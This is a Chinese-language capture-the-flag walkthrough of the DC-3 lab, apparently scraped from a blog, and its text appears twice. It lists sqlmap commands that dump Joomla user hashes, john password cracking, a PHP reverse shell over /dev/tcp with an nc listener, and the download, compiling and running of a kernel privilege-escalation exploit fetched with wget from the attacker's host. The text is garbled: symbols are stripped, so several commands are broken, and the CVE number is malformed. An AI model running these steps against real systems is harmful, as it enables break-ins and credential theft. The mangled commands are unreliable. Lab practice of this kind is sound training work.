信息搜集阶段发现该网站的cms为joomlajoomscan --url url利用joomla专门的扫描器扫描得到版本此版本存在高危sql注入漏洞(CVE-8917)渗透阶段直接用sqlmap跑一下对应expsqlmap -u http://ip/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --dbs --batchsqlmap -u http://ip/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml -D --tables --batchsqlmap -u http://192.168.129.136/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml -D joomladb -T #__users -C username,password --dump --batch获取用户名密码哈希$2y开头对应Bcrypt算法由于其不可逆性只能转换hash值去猜弱口令john hash.txt --wordlist/usr/share/wordlists/rockyou.txt使用john工具破解一下输入账密后进入后台需要我们拿webshell利用模板代码执行进入template页面选择或者新建一个文件写入反弹shell?php system(bash -c bash -i /dev/tcp/ip/监听端口 01);?nc -nvlp 4444开启监听访问刚刚的文件http://目标ip/templates/protostar/error.php后渗透阶段拿到shell后uname -a查看一下目标的内核4.4.0同时i686代表是x86此版本存在CVE-2016-4557提权漏洞本机searchsploit ubuntu 4.4.0选择local privilege32位的searchsploit -m 44298下载到当前目录下python3 -m http.server 8080开启web服务方便目标下载切回目标wget http://本机ip:端口/44298.cgcc 44298.c -o exploit编译此程序chmod x exploit赋权./exploit此处我做的时候是失败了查阅资料发现对应编号是39772
DC3靶场攻略
发布时间:2026/5/21 18:46:02
信息搜集阶段发现该网站的cms为joomlajoomscan --url url利用joomla专门的扫描器扫描得到版本此版本存在高危sql注入漏洞(CVE-8917)渗透阶段直接用sqlmap跑一下对应expsqlmap -u http://ip/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --dbs --batchsqlmap -u http://ip/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml -D --tables --batchsqlmap -u http://192.168.129.136/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml -D joomladb -T #__users -C username,password --dump --batch获取用户名密码哈希$2y开头对应Bcrypt算法由于其不可逆性只能转换hash值去猜弱口令john hash.txt --wordlist/usr/share/wordlists/rockyou.txt使用john工具破解一下输入账密后进入后台需要我们拿webshell利用模板代码执行进入template页面选择或者新建一个文件写入反弹shell?php system(bash -c bash -i /dev/tcp/ip/监听端口 01);?nc -nvlp 4444开启监听访问刚刚的文件http://目标ip/templates/protostar/error.php后渗透阶段拿到shell后uname -a查看一下目标的内核4.4.0同时i686代表是x86此版本存在CVE-2016-4557提权漏洞本机searchsploit ubuntu 4.4.0选择local privilege32位的searchsploit -m 44298下载到当前目录下python3 -m http.server 8080开启web服务方便目标下载切回目标wget http://本机ip:端口/44298.cgcc 44298.c -o exploit编译此程序chmod x exploit赋权./exploit此处我做的时候是失败了查阅资料发现对应编号是39772